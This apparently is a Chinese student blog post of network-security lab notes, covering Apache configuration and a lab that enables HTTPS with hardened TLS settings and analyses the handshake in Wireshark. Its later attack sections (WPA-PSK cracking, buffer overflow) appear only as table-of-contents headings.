<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前置知识 ApacheApache HTTP server，a free open-souce web server software. 核心概念和特点 HTTP 协议处理：旨在有效处理 HTTP 请求响应，支持 HTTP&#x2F;1.1 并具有可用于 HTTP&#x2F;2 的模块 模块化：apache 主要优势之一是其模块化架构。功能可以通过模块进行扩展，定制化轻量服务器 虚拟主机：支持基于">
<meta property="og:type" content="article">
<meta property="og:title" content="网络安全攻防实验">
<meta property="og:url" content="http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/index.html">
<meta property="og:site_name" content="psych&#39;s blog">
<meta property="og:description" content="前置知识 ApacheApache HTTP server，a free open-souce web server software. 核心概念和特点 HTTP 协议处理：旨在有效处理 HTTP 请求响应，支持 HTTP&#x2F;1.1 并具有可用于 HTTP&#x2F;2 的模块 模块化：apache 主要优势之一是其模块化架构。功能可以通过模块进行扩展，定制化轻量服务器 虚拟主机：支持基于">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173745943.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173734815.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173829849.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014433750.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014410603.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014450413.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014508178.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014517715.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014536067.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014546235.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014558703.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014616708.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241224014626769.png">
<meta property="article:published_time" content="2024-10-28T09:33:46.000Z">
<meta property="article:modified_time" content="2024-12-23T17:48:25.943Z">
<meta property="article:author" content="psych">
<meta property="article:tag" content="课内">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173745943.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>网络安全攻防实验</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="psych&#39;s blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Article</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/10/29/%E5%91%BD%E7%90%86%E5%AD%A6%E4%B8%AD%E7%9A%84%E8%BE%A9%E8%AF%81%E6%80%9D%E6%83%B3/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/26/%E6%96%B0%E7%96%86/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&text=网络安全攻防实验"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&is_video=false&description=网络安全攻防实验"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=网络安全攻防实验&body=Check out this article: http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&title=网络安全攻防实验"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&name=网络安全攻防实验&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://p5ych2022.github.io/2024/10/28/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E9%AA%8C/&t=网络安全攻防实验"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Apache"><span class="toc-number">1.1.</span> <span class="toc-text">Apache</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A0%B8%E5%BF%83%E6%A6%82%E5%BF%B5%E5%92%8C%E7%89%B9%E7%82%B9"><span class="toc-number">1.1.1.</span> <span class="toc-text">核心概念和特点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A8%A1%E5%9D%97"><span class="toc-number">1.1.2.</span> <span class="toc-text">模块</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE-apache-HTTP-server"><span class="toc-number">1.1.3.</span> <span class="toc-text">配置 apache HTTP server</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E4%B8%80-TLS-%E9%85%8D%E7%BD%AE%E4%B8%8E%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">实验一 - TLS 配置与流量分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9"><span class="toc-number">2.1.</span> <span class="toc-text">实验内容</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%8E%9F%E7%90%86"><span class="toc-number">2.2.</span> <span class="toc-text">实验原理</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#TLS-%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.2.1.</span> <span class="toc-text">TLS 协议</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#OpenSSL"><span class="toc-number">2.2.2.</span> <span class="toc-text">OpenSSL</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Diffie-Hellman%EF%BC%88DH%EF%BC%89"><span class="toc-number">2.2.3.</span> <span class="toc-text">Diffie-Hellman（DH）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9-1"><span class="toc-number">2.3.</span> <span class="toc-text">实验内容</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="toc-number">2.3.1.</span> <span class="toc-text">环境配置</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E4%BA%8C-WPA-PSK-%E5%8F%A3%E4%BB%A4%E6%94%BB%E5%87%BB"><span class="toc-number">3.</span> <span class="toc-text">实验二 - WPA-PSK 口令攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E8%A6%81%E6%B1%82"><span class="toc-number">3.1.</span> <span class="toc-text">实验要求</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%8E%9F%E7%90%86-1"><span class="toc-number">3.2.</span> <span class="toc-text">实验原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9-2"><span class="toc-number">3.3.</span> <span class="toc-text">实验内容</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E4%B8%89-%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E5%AE%9E%E9%AA%8C"><span class="toc-number">4.</span> <span class="toc-text">实验三 - 缓冲区溢出实验</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E8%A6%81%E6%B1%82-1"><span class="toc-number">4.1.</span> <span class="toc-text">实验要求</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%8E%9F%E7%90%86-2"><span class="toc-number">4.2.</span> <span class="toc-text">实验原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E5%86%85%E5%AE%B9-3"><span class="toc-number">4.3.</span> <span class="toc-text">实验内容</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">4.3.1.</span> <span class="toc-text">实验环境</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BC%96%E5%86%99%E7%A8%8B%E5%BA%8F%E6%B5%8B%E8%AF%95-shellcode"><span class="toc-number">4.3.2.</span> <span class="toc-text">编写程序测试 shellcode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83"><span class="toc-number">4.3.3.</span> <span class="toc-text">通过栈缓冲区溢出进行提权</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        网络安全攻防实验
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">psych</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-10-28T09:33:46.000Z" class="dt-published" itemprop="datePublished">2024-10-28</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E8%AF%BE%E5%86%85/">课内</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/%E8%AF%BE%E5%86%85/" rel="tag">课内</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><hr>
<h3 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h3><p>Apache HTTP server，a free open-souce <strong>web server software.</strong></p>
<h4 id="核心概念和特点"><a href="#核心概念和特点" class="headerlink" title="核心概念和特点"></a>核心概念和特点</h4><ul>
<li>HTTP 协议处理：旨在有效处理 HTTP 请求响应，支持 HTTP&#x2F;1.1 并具有可用于 HTTP&#x2F;2 的模块</li>
<li>模块化：apache 主要优势之一是其模块化架构。功能可以通过模块进行扩展，定制化轻量服务器</li>
<li>虚拟主机：支持基于 IP 和基于名称的虚拟主机，允许单个服务器托管多个网站</li>
<li>安全功能：包括对 SSL&#x2F;TLS 加密，身份验证机制和访问控制的支持</li>
<li>configure：使用纯文本配置文件，主要是 <code>httpd.conf</code> 进行服务器设置，使用 <code>.htaccess</code> 进行目录级配置</li>
</ul>
<h4 id="模块"><a href="#模块" class="headerlink" title="模块"></a>模块</h4><ul>
<li><code>mod_auth_basic</code>, <code>mod_auth_digest</code> ：身份验证和授权模块，控制对资源的访问</li>
<li><code>mod_ssl</code> ：启用加密连接的 SSL&#x2F;TLS 支持。</li>
<li><code>mod_proxy</code> ：提供正向和反向代理功能。</li>
<li><code>mod_rewrite</code> ：允许灵活的 URL 操作和重定向。</li>
<li><code>mod_deflate</code> ：在将内容发送到客户端之前对其进行压缩以节省带宽。</li>
<li><code>mod_cache</code> 、 <code>mod_cache_disk</code> 、 <code>mod_cache_socache</code> ：通过缓存经常访问的内容来提高性能。</li>
</ul>
<h4 id="配置-apache-HTTP-server"><a href="#配置-apache-HTTP-server" class="headerlink" title="配置 apache HTTP server"></a>配置 apache HTTP server</h4><ul>
<li><p>目录结构</p>
<ul>
<li>主配置文件： <code>/etc/apache2/apache2.conf</code></li>
<li>默认站点配置： <code>/etc/apache2/sites-available/000-default.conf</code></li>
<li>模块目录： <code>/etc/apache2/mods-available/</code> 和 <code>/etc/apache2/mods-enabled/</code></li>
<li>文档根目录： <code>/var/www/html/</code></li>
</ul>
</li>
<li><p>启用模块</p>
<ul>
<li><code>sudo a2enmod module_name</code></li>
<li><code>sudo systemctl restart apache2</code></li>
</ul>
</li>
<li><p>Virtual Hosts</p>
<p>创建一个新的配置文件：<code>/etc/apache2/sites-available/psych.green.conf</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;VirtualHost *:80&gt;</span><br><span class="line">    ServerName psych.green</span><br><span class="line">    DocumentRoot /var/www/psych.green/public_html</span><br><span class="line"></span><br><span class="line">    &lt;Directory /var/www/psych.green/public_html&gt;</span><br><span class="line">        Options Indexes FollowSymLinks</span><br><span class="line">        AllowOverride All</span><br><span class="line">        Require all granted</span><br><span class="line">    &lt;/Directory&gt;</span><br><span class="line"></span><br><span class="line">    ErrorLog $&#123;APACHE_LOG_DIR&#125;/psych.green_error.log</span><br><span class="line">    CustomLog $&#123;APACHE_LOG_DIR&#125;/psych.green_access.log combined</span><br><span class="line">&lt;/VirtualHost&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>使用 FastCGI（一种允许 Web 服务器与外部应用程序（如 PHP 脚本）交互以生成动态内容的协议）和PHP-FPM（进程管理器，管理 PHP 进程并允许 Apache 通过 FastCGI 与 PHP 脚本进行通信）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;VirtualHost *:80&gt;</span><br><span class="line">    ServerName psych.green</span><br><span class="line">    DocumentRoot /var/www/psych.green/</span><br><span class="line"></span><br><span class="line">    &lt;FilesMatch \\.php$&gt;</span><br><span class="line">        SetHandler &quot;proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost/&quot;</span><br><span class="line">    &lt;/FilesMatch&gt;</span><br><span class="line"></span><br><span class="line">    # Other configurations</span><br><span class="line">&lt;/VirtualHost&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><code>.htccess</code> —— 提供目录级配置覆盖。</p>
<ul>
<li>URL 重写(使用<code>mod_rewrite</code>)</li>
<li>访问控制</li>
</ul>
<p>在 Apache 中启用 <code>.htaccess</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;Directory /var/www/psych.green/public_html&gt;</span><br><span class="line">    AllowOverride All</span><br><span class="line">&lt;/Directory&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="实验一-TLS-配置与流量分析"><a href="#实验一-TLS-配置与流量分析" class="headerlink" title="实验一 - TLS 配置与流量分析"></a>实验一 - TLS 配置与流量分析</h2><hr>
<h3 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>实验内容</h3><ul>
<li>配置 TLS 协议分析环境</li>
<li>配置 apache 服务器的 https 协议</li>
<li>对指定域名发起 HTTPS 请求，抓包分析 TLS 协议流程、提取其中的关键信息</li>
</ul>
<h3 id="实验原理"><a href="#实验原理" class="headerlink" title="实验原理"></a>实验原理</h3><h4 id="TLS-协议"><a href="#TLS-协议" class="headerlink" title="TLS 协议"></a>TLS 协议</h4><p>网络安全协议概览</p>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173745943.png" alt="image-20241028173745943" style="zoom:33%;" />

<p>TLS协议主要用于网络通信中的<strong>数据加密、完整性验证</strong>和<strong>身份认证</strong>，通常应用于HTTPS、电子邮件、即时通讯等需要保护数据安全的场景。TLS主要由三部分组成：<strong>记录协议</strong>、<strong>握手协议</strong>、<strong>警报协议</strong>。</p>
<p>主要概念：</p>
<ul>
<li><p><strong>加密算法</strong></p>
<p>包括对称加密（如AES）、非对称加密（如RSA）和哈希函数（如SHA-256）。对称加密用于数据加密，非对称加密用于身份认证和密钥交换，哈希函数用于数据完整性验证。</p>
</li>
<li><p><strong>数字证书</strong></p>
<p>数字证书包含服务器的公钥及身份信息，由受信任的CA（证书颁发机构）签发。客户端通过验证服务器证书来确定服务器的真实性。</p>
</li>
<li><p><strong>密钥交换</strong></p>
<p>TLS1.3之前通常使用 RSA 和 Diffie-Hellman 算法。TLS1.3 采用了更高效的密钥交换算法如 ECDHE（椭圆曲线Diffie-Hellman）。</p>
</li>
</ul>
<h4 id="OpenSSL"><a href="#OpenSSL" class="headerlink" title="OpenSSL"></a>OpenSSL</h4><p>一个强大的开源工具包，<strong>支持 TLS 和 SSL 协议的实现及加密功能</strong>，包括加密、解密、数字证书的生成和管理。它广泛应用于网络服务器（如Nginx、Apache）和客户端程序，用于保护数据的传输安全。</p>
<h4 id="Diffie-Hellman（DH）"><a href="#Diffie-Hellman（DH）" class="headerlink" title="Diffie-Hellman（DH）"></a>Diffie-Hellman（DH）</h4><ul>
<li><p>Diffie-Hellman 密钥交换</p>
<p>：</p>
<ul>
<li>DH 是一种加密协议，允许双方在公开信道上安全地生成共享密钥。这个密钥可以用于后续的加密通信。</li>
</ul>
</li>
<li><p>安全性</p>
<p>：</p>
<ul>
<li>DH 协议的安全性基于离散对数问题的困难性，使得即使攻击者能够监听通信，也无法轻易推算出共享密钥。</li>
<li>在 TLS 配置中使用 DH 参数可以增强服务器的安全性，特别是在使用前向保密（Perfect Forward Secrecy, PFS）时。</li>
</ul>
</li>
<li><p>支持多种加密套件</p>
<p>：</p>
<ul>
<li>一些 TLS 加密套件依赖于 DH 参数来进行密钥交换，因此生成这些参数是安全配置的一部分。</li>
</ul>
</li>
</ul>
<h3 id="实验内容-1"><a href="#实验内容-1" class="headerlink" title="实验内容"></a>实验内容</h3><h4 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h4><ol>
<li><p>基本信息</p>
<ul>
<li>主机：windows，安装 wireshark 抓包</li>
<li>虚拟机：Ubuntu，与主机网络连通</li>
</ul>
</li>
<li><p>Ubuntu 配置 apache 服务器的 HTTPS</p>
<ul>
<li><p>创建证书，密钥等</p>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173734815.png" alt="image-20241028173734815" style="zoom: 50%;" />
</li>
<li><p>创建一个强的 DH 群以增强服务安全性：<code>sudo openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048</code></p>
</li>
<li><p>安装 apache</p>
</li>
<li><p>创建 apache 配置文件，并进行强加密设置</p>
<ul>
<li>在 &#x2F;etc&#x2F;apache2&#x2F;conf-available 下创建 ssl-params.conf</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"># from &lt;https://cipherli.st/&gt;</span><br><span class="line"># and &lt;https://raymii.org/s/tutorials/Strong_SSL_Security_On_Apache2.html&gt;</span><br><span class="line">SSLCipherSuite EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH</span><br><span class="line">SSLProtocol All -SSLv2 -SSLv3</span><br><span class="line">SSLHonorCipherOrder On</span><br><span class="line"></span><br><span class="line"># Disable preloading HSTS for now. You can use the commented out header line that includes</span><br><span class="line"># the &quot;preload&quot; directive if you understand the implications.</span><br><span class="line"># Header always set Strict-Transport-Security &quot;max-age=63072000; includeSubdomains; preload&quot;</span><br><span class="line">Header always set Strict-Transport-Security &quot;max-age=63072000; includeSubdomains&quot;</span><br><span class="line">Header always set X-Frame-Options DENY</span><br><span class="line">Header always set X-Content-Type-Options nosniff</span><br><span class="line"></span><br><span class="line"># Requires Apache &gt;= 2.4</span><br><span class="line">SSLCompression off</span><br><span class="line">SSLSessionTickets Off</span><br><span class="line">SSLUseStapling on</span><br><span class="line">SSLStaplingCache &quot;shmcb:logs/stapling-cache(150000)&quot;</span><br><span class="line">SSLOpenSSLConfCmd DHParameters &quot;/etc/ssl/certs/dhparam.pem&quot;</span><br></pre></td></tr></table></figure>
</li>
<li><p>修改默认的 Apache SSL 虚拟主机文件 <code>/etc/apache2/sites-available/default-ssl.conf</code> 包括 Email &amp; Domain、SSLCertificateFile、BrowserMatch</p>
</li>
<li><p>为了更好的安全性，通常也推荐设置为自动重定向 http 访问到 https 访问：修改配置文件 <code>/etc/apache2/sites-available/000-default.conf</code> 加入一个 Redirect 指令来指向 SSL 版本的站点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;VirtualHost *:80&gt;</span><br><span class="line">. . .</span><br><span class="line">Redirect &quot;/&quot; &quot;https://your_domain_or_IP/&quot;</span><br><span class="line">. . .</span><br><span class="line">&lt;/VirtualHost&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>使模块 mod_ssl、mod_headers（配置文件中某些设置需要）生效：<code>sudo a2enmod ssl; sudo a2enmod headers</code></p>
</li>
<li><p>使 SSL 虚拟主机生效：<code>sudo a2ensite default-ssl</code></p>
</li>
<li><p>使 ssl-params.conf 生效：<code>sudo a2enconf ssl-params</code></p>
</li>
<li><p>检查：<code>sudo apache2ctl configtest</code></p>
</li>
<li><p>重启：<code>sudo systemctl restart apache2</code></p>
</li>
</ul>
</li>
<li><p>TLS 流量分析</p>
</li>
</ol>
<p>主机打开 wireshark，设置过滤器为 ssl (仅对 TLS 协议数据分析)。</p>
<p>注意这里的坑是：加了代理之后主机设置了 hosts 也没办法正确重定向到局域网ip，需要关闭代理。。。</p>
<p>设置过滤器为 ssl</p>
<img src="https://cdn.jsdelivr.net/gh/p5ych2022/IHS@master/img/image-20241028173829849.png" alt="image-20241028173829849" style="zoom:33%;" />

<p>按照TLS协议的流程，捕获的消息包含如下内容：</p>
<ol>
<li><p><strong>ClientHello</strong></p>
<p>客户端向服务器发送<code>ClientHello</code>消息，包括TLS版本、支持的加密套件、随机数以及支持的扩展列表。它是 TLS 握手的起始点。</p>
</li>
<li><p><strong>ServerHello</strong></p>
<p>服务器回应<code>ClientHello</code>，选择一个加密套件并确认TLS版本。同时，服务器发送自己的随机数和扩展列表，确定接下来的通信参数。</p>
</li>
<li><p><strong>ChangeCipherSpec</strong></p>
<p>服务器和客户端会分别发送<code>ChangeCipherSpec</code>消息，通知对方接下来的通信内容将使用协商的加密算法和密钥进行加密。</p>
</li>
<li><p><strong>Application Data应用数据</strong></p>
<p>握手完成后，服务器和客户端可以开始发送加密的应用数据。这些数据通过对称加密加密，因此无法直接查看内容。</p>
</li>
</ol>
<h2 id="实验二-WPA-PSK-口令攻击"><a href="#实验二-WPA-PSK-口令攻击" class="headerlink" title="实验二 - WPA-PSK 口令攻击"></a>实验二 - WPA-PSK 口令攻击</h2><hr>
